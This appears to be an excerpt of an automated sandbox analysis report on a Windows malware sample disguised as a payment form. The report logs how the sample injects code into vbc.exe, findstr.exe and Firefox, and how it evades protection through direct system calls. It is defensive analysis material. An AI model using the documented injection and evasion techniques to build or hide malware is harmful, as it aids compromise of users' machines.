            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051916CF mov eax, dword ptr fs:[00000030h]3_2_051916CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0519A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A6C7 mov eax, dword ptr fs:[00000030h]3_2_0519A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F6C7 mov eax, dword ptr fs:[00000030h]3_2_0521F6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E06F1 mov eax, dword ptr fs:[00000030h]3_2_051E06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E06F1 mov eax, dword ptr fs:[00000030h]3_2_051E06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051936EF mov eax, dword ptr fs:[00000030h]3_2_051936EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D6E0 mov eax, dword ptr fs:[00000030h]3_2_0518D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D6E0 mov eax, dword ptr fs:[00000030h]3_2_0518D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161131 mov eax, dword ptr fs:[00000030h]3_2_05161131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161131 mov eax, dword ptr fs:[00000030h]3_2_05161131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05220115 mov eax, dword ptr fs:[00000030h]3_2_05220115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov ecx, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov eax, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov eax, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov eax, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05190124 mov eax, dword ptr fs:[00000030h]3_2_05190124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05166154 mov eax, dword ptr fs:[00000030h]3_2_05166154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05166154 mov eax, dword ptr fs:[00000030h]3_2_05166154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515C156 mov eax, dword ptr fs:[00000030h]3_2_0515C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05167152 mov eax, dword ptr fs:[00000030h]3_2_05167152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov ecx, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F9179 mov eax, dword ptr fs:[00000030h]3_2_051F9179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05235152 mov eax, dword ptr fs:[00000030h]3_2_05235152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A197 mov eax, dword ptr fs:[00000030h]3_2_0515A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A197 mov eax, dword ptr fs:[00000030h]3_2_0515A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A197 mov eax, dword ptr fs:[00000030h]3_2_0515A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051B7190 mov eax, dword ptr fs:[00000030h]3_2_051B7190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A0185 mov eax, dword ptr fs:[00000030h]3_2_051A0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517B1B0 mov eax, dword ptr fs:[00000030h]3_2_0517B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521C188 mov eax, dword ptr fs:[00000030h]3_2_0521C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521C188 mov eax, dword ptr fs:[00000030h]3_2_0521C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052361E5 mov eax, dword ptr fs:[00000030h]3_2_052361E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519D1D0 mov eax, dword ptr fs:[00000030h]3_2_0519D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519D1D0 mov ecx, dword ptr fs:[00000030h]3_2_0519D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov ecx, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052261C3 mov eax, dword ptr fs:[00000030h]3_2_052261C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052261C3 mov eax, dword ptr fs:[00000030h]3_2_052261C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051901F8 mov eax, dword ptr fs:[00000030h]3_2_051901F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052351CB mov eax, dword ptr fs:[00000030h]3_2_052351CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051651ED mov eax, dword ptr fs:[00000030h]3_2_051651ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Code function: 0_2_00007FF6E8257D00 RtlAddVectoredExceptionHandler,RaiseFailFastException
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Code function: 0_2_00007FF6E82B0EAC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQueryValueKey: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtOpenKeyEx: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe protection: read write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe Thread register set: target process: 8104
            Source: C:\Windows\SysWOW64\findstr.exe Thread APC queued: target process: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 70E008
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
